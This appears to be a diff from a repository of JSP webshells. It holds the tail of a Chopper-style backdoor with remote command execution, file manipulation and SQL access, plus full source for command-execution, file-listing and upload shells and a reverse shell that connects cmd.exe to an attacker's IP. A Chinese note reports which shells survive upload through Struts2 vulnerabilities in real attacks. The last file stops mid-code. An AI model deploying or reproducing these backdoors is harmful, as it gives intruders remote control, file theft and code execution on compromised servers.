{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
|
||||
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
|
||||
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
|
||||
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
|
||||
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
|
||||
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
|
||||
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
|
||||
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
|
||||
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
|
||||
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
|
||||
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
|
||||
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
|
||||
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
|
||||
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
|
||||
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
|
||||
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
|
||||
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
|
||||
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
|
||||
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
|
||||
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
|
||||
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
|
||||
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
|
||||
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
|
||||
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
|
||||
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
|
||||
%><%
|
||||
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
|
||||
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
|
||||
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
|
||||
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
|
||||
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
|
||||
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
|
||||
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
|
||||
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
|
||||
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
|
||||
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
|
||||
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
|
||||
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
|
||||
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
|
||||
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
|
||||
%>
|
54
jsp/hackk8/Struts2下shell兼容性报告_K8.txt
Normal file
54
jsp/hackk8/Struts2下shell兼容性报告_K8.txt
Normal file
|
@ -0,0 +1,54 @@
|
|||
|
||||
struts2 环境下 jspshell 功能测试 2013.5.23 by 拉登哥哥
|
||||
看下这个报告 你们就知道 为啥s2上传的shell成功率低的原因了
|
||||
上传不成功或内容被过滤是另外的事 上传成功的shell没被过滤又不解析或报错 就是以下原因了
|
||||
|
||||
struts 2.2.1.1 默认环境下 以下报告是在这版本下的 别的版本未知
|
||||
好像默认环境没带有IO操作 还有 org.apache.jasper(S2文件上传组件)
|
||||
自己找了无组件上传的jsp 也报废...
|
||||
|
||||
|
||||
K8收集的(其实之前也在网上问人要来的一些 wooyun某群群主 还有其它成员)
|
||||
|
||||
k8cmd.jsp 兼容性非常好 不管在s2 还是普通环境下都正常使用
|
||||
实战 支持Win/Linux 还有执行的命令通过飞刀加密发送
|
||||
|
||||
普通 cmd.jsp啥的 可以使用 不用说了 但是在linux下不行
|
||||
|
||||
other下面的大马 丢到struts2环境下 没一个能正常解析的
|
||||
|
||||
JspWebshell 1.2.jsp 能解析 但上传不了文件 好像是马写的有问题
|
||||
|
||||
JavaShell.jsp jsp-reverse.jsp 也不能解析
|
||||
|
||||
kbaidu8.jsp 兼容性8错 哥专用的 原版 jspspy 1.0 但是上传文件也是失败的 1.2版本的直接报废
|
||||
|
||||
Customize.jsp 菜刀的jsp马 本地s2环境 报错 连接上也可以操作
|
||||
实战 通过struts2的洞 上传过去的 功能就废了(linux下) win的还未测试
|
||||
|
||||
JSP无组件实现WEB上传.rar 也失效
|
||||
|
||||
一句话jsp那个 可以传过去 但是无法写出文件
|
||||
|
||||
|
||||
77收集的几个 Win下测试
|
||||
|
||||
browser.jsp 可以使用 但是文件上传功能报废 原因都是这个组件 org.apache.jasper
|
||||
|
||||
还有是cmd相关的也可用 也只是win下的
|
||||
|
||||
其它都是直接报废。。。。。
|
||||
|
||||
法客工具包里的jsp
|
||||
no.jsp 其实是那个什么jsfoloer改的 也是上传文件功能不行 别的功能未测
|
||||
silic webshell.jsp 和no.jsp in.jsp都是jsfoloer改的
|
||||
|
||||
JspSpyJDK5.jsp 报废
|
||||
|
||||
ma2.jsp 能解析 但上传文件那失败 java.io.IOException: 这就是IO了
|
||||
ma3.jsp 直接报废 因为使用的是jasper
|
||||
ma1.jsp 和ma4.jsp job.jsp探针 能正常解析
|
||||
spjspshell.jsp 直接报废 同ma3.jsp 用的组件一样
|
||||
|
||||
总结: 普通单纯执行cmd一类的都能正常运行,探针也是 个别大马也勉强 jspspy 1.0兼容性 比较靠普
|
||||
在这些样本里90%都挂了 实战中 也许有些站加了上传组件啥的 可能部分上传脚本还是能用的 具体自测
|
BIN
jsp/hackk8/jsp2/CmdServlet.class
Normal file
BIN
jsp/hackk8/jsp2/CmdServlet.class
Normal file
Binary file not shown.
43
jsp/hackk8/jsp2/CmdServlet.java
Normal file
43
jsp/hackk8/jsp2/CmdServlet.java
Normal file
|
@ -0,0 +1,43 @@
|
|||
/*
|
||||
* CmdServlet.java 20/01/2004
|
||||
*
|
||||
* @author The Dark Raver
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.*;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
|
||||
public class CmdServlet extends HttpServlet {
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
res.setContentType("text/html");
|
||||
|
||||
PrintWriter out = res.getWriter();
|
||||
out.print("<html><body>");
|
||||
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
|
||||
out.print("<input type=\"text\" name=\"cmd\">");
|
||||
out.print("<input type=\"submit\" value=\"Send\">");
|
||||
out.print("</form>");
|
||||
|
||||
if(req.getParameter("cmd") != null) {
|
||||
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
|
||||
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
|
||||
DataInputStream procIn = new DataInputStream(p.getInputStream());
|
||||
int c='\0';
|
||||
while ((c=procIn.read()) != -1) {
|
||||
out.print((char)c);
|
||||
}
|
||||
}
|
||||
|
||||
out.print("\n<hr></pre>");
|
||||
out.print("</body></html>");
|
||||
}
|
||||
|
||||
public String getServletInfo() {
|
||||
return "CmdServlet 0.1";
|
||||
}
|
||||
|
||||
}
|
BIN
jsp/hackk8/jsp2/ListServlet.class
Normal file
BIN
jsp/hackk8/jsp2/ListServlet.class
Normal file
Binary file not shown.
86
jsp/hackk8/jsp2/ListServlet.java
Normal file
86
jsp/hackk8/jsp2/ListServlet.java
Normal file
|
@ -0,0 +1,86 @@
|
|||
/*
|
||||
* ListServlet.java
|
||||
*
|
||||
* @author Sierra
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.ServletException;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
public class ListServlet extends HttpServlet
|
||||
{
|
||||
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
PrintWriter printwriter = res.getWriter();
|
||||
String path = req.getParameter("file");
|
||||
|
||||
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
|
||||
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
|
||||
if(req.getParameter("file")==null) path = "c:\\";
|
||||
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
|
||||
|
||||
File file = new File(path);
|
||||
|
||||
if(file.isDirectory())
|
||||
{
|
||||
String s = new String("Unknown");
|
||||
String s2 = new String("Black");
|
||||
File afile[] = file.listFiles();
|
||||
for(int i = 0; i < afile.length; i++)
|
||||
{
|
||||
String s1 = new String(afile[i].toString());
|
||||
printwriter.write("(");
|
||||
String s3;
|
||||
if(afile[i].isDirectory())
|
||||
{
|
||||
printwriter.write("d");
|
||||
s1 = s1 + "/";
|
||||
s3 = new String("Blue");
|
||||
} else
|
||||
if(afile[i].isFile())
|
||||
{
|
||||
printwriter.write("-");
|
||||
s3 = new String("Green");
|
||||
} else
|
||||
{
|
||||
printwriter.write("?");
|
||||
s3 = new String("Red");
|
||||
}
|
||||
if(afile[i].canRead())
|
||||
printwriter.write("r");
|
||||
else
|
||||
printwriter.write("-");
|
||||
if(afile[i].canWrite())
|
||||
printwriter.write("w");
|
||||
else
|
||||
printwriter.write("-");
|
||||
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
|
||||
}
|
||||
|
||||
printwriter.write("<hr></FONT></BODY></HTML>");
|
||||
} else
|
||||
if(file.canRead())
|
||||
{
|
||||
FileInputStream fileinputstream = new FileInputStream(file);
|
||||
int j = 0;
|
||||
while(j >= 0)
|
||||
{
|
||||
j = fileinputstream.read();
|
||||
printwriter.write(j);
|
||||
}
|
||||
fileinputstream.close();
|
||||
} else
|
||||
{
|
||||
printwriter.write("Can't Read file<BR>");
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
public String getServletInfo() {
|
||||
return "Directory Listing";
|
||||
}
|
||||
}
|
BIN
jsp/hackk8/jsp2/UpServlet.class
Normal file
BIN
jsp/hackk8/jsp2/UpServlet.class
Normal file
Binary file not shown.
71
jsp/hackk8/jsp2/UpServlet.java
Normal file
71
jsp/hackk8/jsp2/UpServlet.java
Normal file
|
@ -0,0 +1,71 @@
|
|||
/*
|
||||
* UpServlet.java 29/04/2005
|
||||
*
|
||||
* @author The Dark Raver
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.*;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
|
||||
public class UpServlet extends HttpServlet {
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
res.setContentType("text/html");
|
||||
PrintWriter out = res.getWriter();
|
||||
out.print("<html><body>");
|
||||
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
|
||||
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
|
||||
out.print("<input type=\"submit\" value=\"Upload\">");
|
||||
out.print("</form>");
|
||||
out.print("</body></html>");
|
||||
}
|
||||
|
||||
|
||||
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
String tag = new String();
|
||||
int c = '\0';
|
||||
int contador = 0;
|
||||
ServletInputStream in = req.getInputStream();
|
||||
DataInputStream post = new DataInputStream(in);
|
||||
|
||||
PrintWriter out = res.getWriter();
|
||||
res.setContentType("text/html");
|
||||
out.print("<pre>");
|
||||
|
||||
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
|
||||
tag=tag.concat("" + (char)c);
|
||||
contador++;
|
||||
}
|
||||
|
||||
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
|
||||
|
||||
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
|
||||
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
|
||||
|
||||
// (!) Uploaded File Name
|
||||
|
||||
File newfile = new File("c:\\install.log");
|
||||
|
||||
/////////////////////////
|
||||
|
||||
FileOutputStream fileout = new FileOutputStream(newfile);
|
||||
|
||||
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
|
||||
c=post.read();
|
||||
fileout.write((char)c);
|
||||
}
|
||||
|
||||
fileout.close();
|
||||
out.print("<== OK");
|
||||
|
||||
}
|
||||
|
||||
|
||||
public String getServletInfo() {
|
||||
return "UpServlet 0.1";
|
||||
}
|
||||
|
||||
}
|
1802
jsp/hackk8/jsp2/browser.jsp
Normal file
1802
jsp/hackk8/jsp2/browser.jsp
Normal file
File diff suppressed because it is too large
Load diff
35
jsp/hackk8/jsp2/cmd.jsp
Normal file
35
jsp/hackk8/jsp2/cmd.jsp
Normal file
|
@ -0,0 +1,35 @@
|
|||
<%@ page import="java.util.*,java.io.*"%>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// cmd.jsp = Command Execution (unix)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="GET" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<%
|
||||
if (request.getParameter("cmd") != null) {
|
||||
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
||||
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
String disr = dis.readLine();
|
||||
while ( disr != null ) {
|
||||
out.println(disr);
|
||||
disr = dis.readLine();
|
||||
}
|
||||
}
|
||||
%>
|
||||
</pre>
|
||||
</BODY></HTML>
|
||||
|
||||
|
32
jsp/hackk8/jsp2/cmdjsp.jsp
Normal file
32
jsp/hackk8/jsp2/cmdjsp.jsp
Normal file
|
@ -0,0 +1,32 @@
|
|||
// note that linux = cmd and windows = "cmd.exe /c + cmd"
|
||||
|
||||
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
||||
<INPUT name='cmd' type=text>
|
||||
<INPUT type=submit value='Run'>
|
||||
</FORM>
|
||||
|
||||
<%@ page import="java.io.*" %>
|
||||
<%
|
||||
String cmd = request.getParameter("cmd");
|
||||
String output = "";
|
||||
|
||||
if(cmd != null) {
|
||||
String s = null;
|
||||
try {
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
|
||||
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((s = sI.readLine()) != null) {
|
||||
output += s;
|
||||
}
|
||||
}
|
||||
catch(IOException e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
<pre>
|
||||
<%=output %>
|
||||
</pre>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
91
jsp/hackk8/jsp2/jsp-reverse.jsp
Normal file
91
jsp/hackk8/jsp2/jsp-reverse.jsp
Normal file
|
@ -0,0 +1,91 @@
|
|||
// backdoor.jsp
|
||||
// http://www.security.org.sg/code/jspreverse.html
|
||||
|
||||
<%@
|
||||
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
|
||||
% >
|
||||
<%!
|
||||
static class StreamConnector extends Thread
|
||||
{
|
||||
InputStream is;
|
||||
OutputStream os;
|
||||
|
||||
StreamConnector(InputStream is, OutputStream os)
|
||||
{
|
||||
this.is = is;
|
||||
this.os = os;
|
||||
}
|
||||
|
||||
public void run()
|
||||
{
|
||||
BufferedReader isr = null;
|
||||
BufferedWriter osw = null;
|
||||
|
||||
try
|
||||
{
|
||||
isr = new BufferedReader(new InputStreamReader(is));
|
||||
osw = new BufferedWriter(new OutputStreamWriter(os));
|
||||
|
||||
char buffer[] = new char[8192];
|
||||
int lenRead;
|
||||
|
||||
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
|
||||
{
|
||||
osw.write(buffer, 0, lenRead);
|
||||
osw.flush();
|
||||
}
|
||||
}
|
||||
catch (Exception ioe)
|
||||
|
||||
try
|
||||
{
|
||||
if(isr != null) isr.close();
|
||||
if(osw != null) osw.close();
|
||||
}
|
||||
catch (Exception ioe)
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
<h1>JSP Backdoor Reverse Shell</h1>
|
||||
|
||||
<form method="post">
|
||||
IP Address
|
||||
<input type="text" name="ipaddress" size=30>
|
||||
Port
|
||||
<input type="text" name="port" size=10>
|
||||
<input type="submit" name="Connect" value="Connect">
|
||||
</form>
|
||||
<p>
|
||||
<hr>
|
||||
|
||||
<%
|
||||
String ipAddress = request.getParameter("ipaddress");
|
||||
String ipPort = request.getParameter("port");
|
||||
|
||||
if(ipAddress != null && ipPort != null)
|
||||
{
|
||||
Socket sock = null;
|
||||
try
|
||||
{
|
||||
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
|
||||
|
||||
Runtime rt = Runtime.getRuntime();
|
||||
Process proc = rt.exec("cmd.exe");
|
||||
|
||||
StreamConnector outputConnector =
|
||||
new StreamConnector(proc.getInputStream(),
|
||||
sock.getOutputStream());
|
||||
|
||||
StreamConnector inputConnector =
|
||||
new StreamConnector(sock.getInputStream(),
|
||||
proc.getOutputStream());
|
||||
|
||||
outputConnector.start();
|
||||
inputConnector.start();
|
||||
}
|
||||
catch(Exception e)
|
||||
}
|
||||
%>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
77
jsp/hackk8/jsp2/list.jsp
Normal file
77
jsp/hackk8/jsp2/list.jsp
Normal file
|
@ -0,0 +1,77 @@
|
|||
<%@ page import="java.util.*,java.io.*"%>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// list.jsp = Directory & File View
|
||||
//
|
||||
// by: Sierra
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<%
|
||||
if(request.getParameter("file")==null) {
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="POST" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="file">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
<% //read the file name.
|
||||
try {
|
||||
File f = new File(request.getParameter("file"));
|
||||
if(f.isDirectory()) {
|
||||
int i;
|
||||
String fname = new String("Unknown");
|
||||
String fcolor = new String("Black");
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FONT Face="Courier New, Helvetica" Color="Black">
|
||||
<%
|
||||
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
|
||||
File flist[] = f.listFiles();
|
||||
for(i=0; i<flist.length; i++) {
|
||||
fname = new String( flist[i].toString());
|
||||
out.print("(");
|
||||
if(flist[i].isDirectory() == true) {
|
||||
out.print("d");
|
||||
fname = fname + "/";
|
||||
fcolor = new String("Blue");
|
||||
} else if( flist[i].isFile() == true ) {
|
||||
out.print("-");
|
||||
fcolor = new String("Green");
|
||||
} else {
|
||||
out.print("?");
|
||||
fcolor = new String("Red");
|
||||
}
|
||||
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
|
||||
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
|
||||
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
|
||||
}
|
||||
%>
|
||||
</FONT></BODY></HTML>
|
||||
<%
|
||||
|
||||
} else {
|
||||
if(f.canRead() == true) {
|
||||
InputStream in = new FileInputStream(f);
|
||||
ServletOutputStream outs = response.getOutputStream();
|
||||
int left = 0;
|
||||
try {
|
||||
while((left) >= 0 ) {
|
||||
left = in.read();
|
||||
outs.write(left);
|
||||
}
|
||||
} catch(IOException ex) {ex.printStackTrace();}
|
||||
outs.flush();
|
||||
outs.close();
|
||||
in.close();
|
||||
} else {
|
||||
out.print("Can't Read file<BR>");
|
||||
}
|
||||
}
|
||||
} catch(Exception ex) {ex.printStackTrace();}
|
||||
%>
|
162
jsp/hackk8/jsp2/up.jsp
Normal file
162
jsp/hackk8/jsp2/up.jsp
Normal file
|
@ -0,0 +1,162 @@
|
|||
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
|
||||
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// up.jsp = File Upload (unix)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<html>
|
||||
<form name="test" method="post" action="" enctype="multipart/form-data">
|
||||
<input type="File" name="fichero">
|
||||
<input type="Submit" value="Upload" name="Submit">
|
||||
</form>
|
||||
</html>
|
||||
<%!
|
||||
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
|
||||
String boundary = null;
|
||||
Enumeration enum = request.getHeaderNames();
|
||||
while(enum.hasMoreElements()){
|
||||
String header = (String)enum.nextElement();
|
||||
String hvalue = request.getHeader(header);
|
||||
prop.setProperty((header).toLowerCase(),hvalue);
|
||||
if("content-type".equalsIgnoreCase(header) ){
|
||||
int idx = hvalue.lastIndexOf("boundary=");
|
||||
if(idx != -1 ){
|
||||
boundary= hvalue.substring(idx+9 , hvalue.length());
|
||||
}
|
||||
}
|
||||
}
|
||||
return boundary;
|
||||
|
||||
}
|
||||
public String getFileName(String secondline){
|
||||
int len = secondline.length();
|
||||
int idx = secondline.lastIndexOf("filename=");
|
||||
if(idx == -1 ) return null;
|
||||
String filename = secondline.substring(idx+10 , len-1);
|
||||
filename = filename.replace('\\','/');
|
||||
idx = filename.lastIndexOf("/");
|
||||
idx = idx + 1;
|
||||
filename = filename.substring( idx );
|
||||
return filename;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
String DPATH = "/tmp/";
|
||||
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
|
||||
int MAXSIZE = 10; // 10 Mega Byte
|
||||
String boundary = getBoundary(request,prop);
|
||||
if(boundary == null ){
|
||||
boundary = prop.getProperty("boundary");
|
||||
}else{
|
||||
boundary = "--"+boundary;
|
||||
}
|
||||
if(boundary == null ){
|
||||
return;
|
||||
}
|
||||
Long contentsize = new Long(prop.getProperty("content-length","0"));
|
||||
int c;
|
||||
StringWriter st = new StringWriter();
|
||||
if(contentsize.longValue() < 1L ){
|
||||
return;
|
||||
}
|
||||
long l = contentsize.longValue() - ROUGHSIZE;
|
||||
int KB = 1024;
|
||||
int MB = 1024 * KB;
|
||||
int csize = (int)(l / MB);
|
||||
if(csize > MAXSIZE ){
|
||||
return;
|
||||
}
|
||||
ServletInputStream fin = request.getInputStream();
|
||||
int cn;
|
||||
int count=0;
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r') break;
|
||||
st.write(c);
|
||||
count++;
|
||||
}
|
||||
c=fin.read();
|
||||
String tboundary = st.getBuffer().toString();
|
||||
tboundary=tboundary.trim();
|
||||
if(! tboundary.equalsIgnoreCase( boundary) ){
|
||||
return;
|
||||
}
|
||||
st.close();
|
||||
st = null;
|
||||
st = new StringWriter();
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r' ) break;
|
||||
st.write(c);
|
||||
}
|
||||
c=fin.read();
|
||||
String secondline = st.getBuffer().toString();
|
||||
String filename = getFileName(secondline);
|
||||
st.close();
|
||||
st = null;
|
||||
st = new StringWriter();
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r' ) break;
|
||||
st.write( c );
|
||||
}
|
||||
c=fin.read();
|
||||
|
||||
fin.read();
|
||||
fin.read();
|
||||
File newfile = null;
|
||||
FileOutputStream fout =null;
|
||||
try{
|
||||
if(filename == null) throw new FileNotFoundException("File Name not found");
|
||||
newfile = new File(DPATH+filename);
|
||||
fout = new FileOutputStream( newfile );
|
||||
}catch(FileNotFoundException fnexp){
|
||||
fin.close();
|
||||
return;
|
||||
}
|
||||
|
||||
byte b[] = null;
|
||||
while(l > 1024L){
|
||||
b = new byte[1024];
|
||||
fin.read(b,0,1024);
|
||||
fout.write(b);
|
||||
b=null;
|
||||
l -= 1024L;
|
||||
}
|
||||
if(l > 0){
|
||||
b = new byte[(int)l];
|
||||
fin.read(b,0,(int)l);
|
||||
fout.write(b);
|
||||
}
|
||||
|
||||
|
||||
ByteArrayOutputStream baos = new ByteArrayOutputStream();
|
||||
while((c = fin.read()) != -1){
|
||||
baos.write(c);
|
||||
}
|
||||
String laststring = baos.toString();
|
||||
int idx = laststring.indexOf(boundary);
|
||||
b = baos.toByteArray();
|
||||
if(idx > 2){
|
||||
fout.write(b,0,idx-2);
|
||||
}else{
|
||||
fout.close();
|
||||
newfile.delete();
|
||||
return;
|
||||
}
|
||||
fout.flush();
|
||||
fout.close();
|
||||
fin.close();
|
||||
|
||||
out.println("FileName: " + newfile.getName());
|
||||
out.println("FileSize: " + newfile.length());
|
||||
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
31
jsp/hackk8/jsp2/win32/cmd_win32.jsp
Normal file
31
jsp/hackk8/jsp2/win32/cmd_win32.jsp
Normal file
|
@ -0,0 +1,31 @@
|
|||
<%@ page import="java.util.*,java.io.*,java.net.*"%>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// cmd.jsp = Command Execution (win32)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="POST" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<%
|
||||
if (request.getParameter("cmd") != null) {
|
||||
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
String disr = dis.readLine();
|
||||
while ( disr != null ) {
|
||||
out.println(disr); disr = dis.readLine(); }
|
||||
}
|
||||
%>
|
||||
</pre>
|
||||
</BODY></HTML>
|
162
jsp/hackk8/jsp2/win32/up_win32.jsp
Normal file
162
jsp/hackk8/jsp2/win32/up_win32.jsp
Normal file
|
@ -0,0 +1,162 @@
|
|||
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
|
||||
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// up.jsp = File Upload (win32)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<html>
|
||||
<form name="test" method="post" action="" enctype="multipart/form-data">
|
||||
<input type="File" name="fichero">
|
||||
<input type="Submit" value="Upload" name="Submit">
|
||||
</form>
|
||||
</html>
|
||||
<%!
|
||||
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
|
||||
String boundary = null;
|
||||
Enumeration enum = request.getHeaderNames();
|
||||
